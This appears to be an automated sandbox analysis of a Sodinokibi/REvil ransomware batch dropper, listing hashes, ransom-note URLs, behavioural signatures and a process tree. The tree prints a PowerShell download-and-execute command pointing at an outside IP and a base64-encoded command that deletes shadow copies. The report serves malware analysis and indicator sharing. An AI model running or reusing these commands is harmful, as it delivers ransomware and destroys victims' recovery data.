Analysis
-
max time kernel
146s -
max time network
80s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
30-04-2020 18:10
Static task
static1
Behavioral task
behavioral1
Sample
Cjbh0M3S.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
Cjbh0M3S.bat
Resource
win10v200430
General
-
Target
Cjbh0M3S.bat
-
Size
193B
-
MD5
5d7075d9a1018ed0ee80c0e92c3626cb
-
SHA1
b3ca818f726d96177859eb15d4871525383594bb
-
SHA256
44fb52f56f3b557e8fd8346ecc5536ca63a3c88eac2ce4549565d9501795c91a
-
SHA512
bdd921b5de3eb45836fc4fc1cbb0efdec848a049c3d47d7646ed55927f7ac838480b266d5f361b1d0f99c530dffc4ba45e4962901a30432f1f8c1777bb9ac96c
Malware Config
Extracted
http://185.103.242.78/pastes/Cjbh0M3S
Extracted
C:\a21g6-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/43AE3FBA7B121249
http://decryptor.cc/43AE3FBA7B121249
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1020 wrote to memory of 1052 1020 cmd.exe powershell.exe PID 1052 wrote to memory of 1908 1052 powershell.exe powershell.exe PID 1052 wrote to memory of 1908 1052 powershell.exe powershell.exe PID 1052 wrote to memory of 1908 1052 powershell.exe powershell.exe PID 1052 wrote to memory of 1908 1052 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1052 powershell.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeBackupPrivilege 1140 vssvc.exe Token: SeRestorePrivilege 1140 vssvc.exe Token: SeAuditPrivilege 1140 vssvc.exe Token: SeTakeOwnershipPrivilege 1052 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 1052 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Makes http(s) request 1 IoCs
Contacts server via http/https, possibly for C2 communication.
Processes:
description flow ioc HTTP URL 3 http://185.103.242.78/pastes/Cjbh0M3S -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1052 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1052 powershell.exe 1052 powershell.exe 1052 powershell.exe 1908 powershell.exe 1908 powershell.exe -
Drops file in Program Files directory 24 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\OutNew.mht powershell.exe File opened for modification \??\c:\program files\PopPublish.WTV powershell.exe File opened for modification \??\c:\program files\SetConfirm.mpeg3 powershell.exe File opened for modification \??\c:\program files\UnblockRevoke.xltm powershell.exe File opened for modification \??\c:\program files\UndoSuspend.ini powershell.exe File opened for modification \??\c:\program files\UnprotectAssert.eps powershell.exe File created \??\c:\program files (x86)\a21g6-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\a21g6-readme.txt powershell.exe File opened for modification \??\c:\program files\SubmitBackup.dib powershell.exe File opened for modification \??\c:\program files\EnableSelect.jpe powershell.exe File opened for modification \??\c:\program files\MoveSubmit.mpeg3 powershell.exe File opened for modification \??\c:\program files\ConvertToPing.wav powershell.exe File opened for modification \??\c:\program files\ResetRestart.tiff powershell.exe File opened for modification \??\c:\program files\SplitRemove.avi powershell.exe File opened for modification \??\c:\program files\SubmitSuspend.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\a21g6-readme.txt powershell.exe File created \??\c:\program files\a21g6-readme.txt powershell.exe File opened for modification \??\c:\program files\AssertInvoke.vdx powershell.exe File opened for modification \??\c:\program files\DismountClose.3gp2 powershell.exe File opened for modification \??\c:\program files\ImportResize.3gpp powershell.exe File opened for modification \??\c:\program files\SubmitJoin.docx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\a21g6-readme.txt powershell.exe File opened for modification \??\c:\program files\ApproveResolve.dotx powershell.exe File opened for modification \??\c:\program files\AssertConvert.TS powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\5e3ef1t9sy.bmp" powershell.exe -
Enumerates connected drives 3 TTPs
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Cjbh0M3S.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Cjbh0M3S');Invoke-XZCJULAOHR;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1908
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1140